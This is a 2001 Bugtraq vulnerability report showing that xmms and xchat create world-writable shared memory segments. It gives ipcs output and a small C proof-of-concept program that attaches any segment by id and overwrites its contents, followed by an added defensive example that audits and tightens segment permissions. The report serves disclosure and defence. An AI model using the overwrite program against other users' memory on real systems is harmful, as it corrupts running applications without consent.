[23061] in bugtraq
xmms/xchat full access shared memory segments
daemon@ATHENA.MIT.EDU (Julien VANEGUE)
Sun Nov 4 21:44:09 2001
From: Julien VANEGUE <vanegu_j@epita.fr>
Reply-To: vanegu_j@epita.fr
To: bugtraq@securityfocus.com
Date: Sat, 3 Nov 2001 12:22:23 +0200
Message-Id: <0111031122230M.12122@daril>
On Slackware 8:
bash-2.05$ ipcs -m
------ Shared Memory Segments --------
key shmid owner perms bytes nattch status
0x00000000 4216960 mayhem 777 196608 2 dest
0x00000000 7636737 mayhem 777 196608 2 dest
bash-2.05$ ipcs -p -m
------ Shared Memory Creator/Last-op --------
shmid owner cpid lpid
4216960 mayhem 3921 1406
7636737 mayhem 26206 26209
bash-2.05$ cat /proc/3921/cmdline ; echo
/opt/gnome/bin/xmms
bash-2.05$ cat /proc/26206/cmdline ; echo
/opt/gnome/bin/xchat
bash-2.05$
Seems not to be exploitable (no fault) but still needs to be fixed.
/*
** test_shm.c
**
** Made by Julien Vanegue
** Login <mayhem@hert.org>
*/
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset */
#include <unistd.h>   /* sleep */

#define FATAL(str) { perror(str); exit(-1); }

void usage(void)
{
    fprintf(stderr, "syntax: a.out shmid size \n");
    exit(-1);
}

int main(int argc, char **argv)
{
    char *addr;

    if (argc != 3)
        usage();
    /* Attach the segment by id; with perms 777 any local user can do this */
    if ((addr = shmat(atoi(argv[1]), 0, 0)) == (void *) -1)
        FATAL("shmat");
    /* Overwrite the first <size> bytes of the attached segment */
    memset(addr, 'A', atoi(argv[2]));
    sleep(2);
    return 0;
}
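
A defender's check for the condition shown in the ipcs output above, as an added example that is not part of the original post: it reads a segment's permission bits with shmctl(IPC_STAT), reports whether other users can access it, and tightens the mode to owner-only with IPC_SET. The helper names shm_create, shm_world_accessible and shm_restrict_to_owner are hypothetical, and the segments are constructed test input.

```c
/* Added example: audit and tighten SysV shared memory permissions. */
#include <stdio.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/stat.h>

/* Hypothetical helper: create a private segment with the given mode bits. */
int shm_create(size_t size, int mode)
{
    return shmget(IPC_PRIVATE, size, IPC_CREAT | IPC_EXCL | (mode & 0777));
}

/* 1 if "other" users may read or write the segment, 0 if not, -1 on error. */
int shm_world_accessible(int shmid)
{
    struct shmid_ds ds;

    if (shmctl(shmid, IPC_STAT, &ds) == -1)
        return -1;
    return (ds.shm_perm.mode & (S_IROTH | S_IWOTH)) ? 1 : 0;
}

/* Reduce a segment we own to owner read/write only (0600). */
int shm_restrict_to_owner(int shmid)
{
    struct shmid_ds ds;

    if (shmctl(shmid, IPC_STAT, &ds) == -1)
        return -1;
    ds.shm_perm.mode &= 0600;   /* IPC_SET applies only the low 9 bits */
    return shmctl(shmid, IPC_SET, &ds);
}

int main(void)
{
    /* Constructed input: same size and perms as the segments in the ipcs output. */
    int weak = shm_create(196608, 0777);
    int safe = shm_create(196608, 0600);

    if (weak == -1 || safe == -1) { perror("shmget"); return 1; }
    printf("0777 segment world-accessible: %d\n", shm_world_accessible(weak));
    printf("0600 segment world-accessible: %d\n", shm_world_accessible(safe));
    shm_restrict_to_owner(weak);
    printf("after IPC_SET:                 %d\n", shm_world_accessible(weak));
    shmctl(weak, IPC_RMID, NULL);   /* remove both test segments */
    shmctl(safe, IPC_RMID, NULL);
    return 0;
}
```

Passing 0600 to shmget at creation time is the direct fix; the IPC_SET path only helps for segments the calling user already owns.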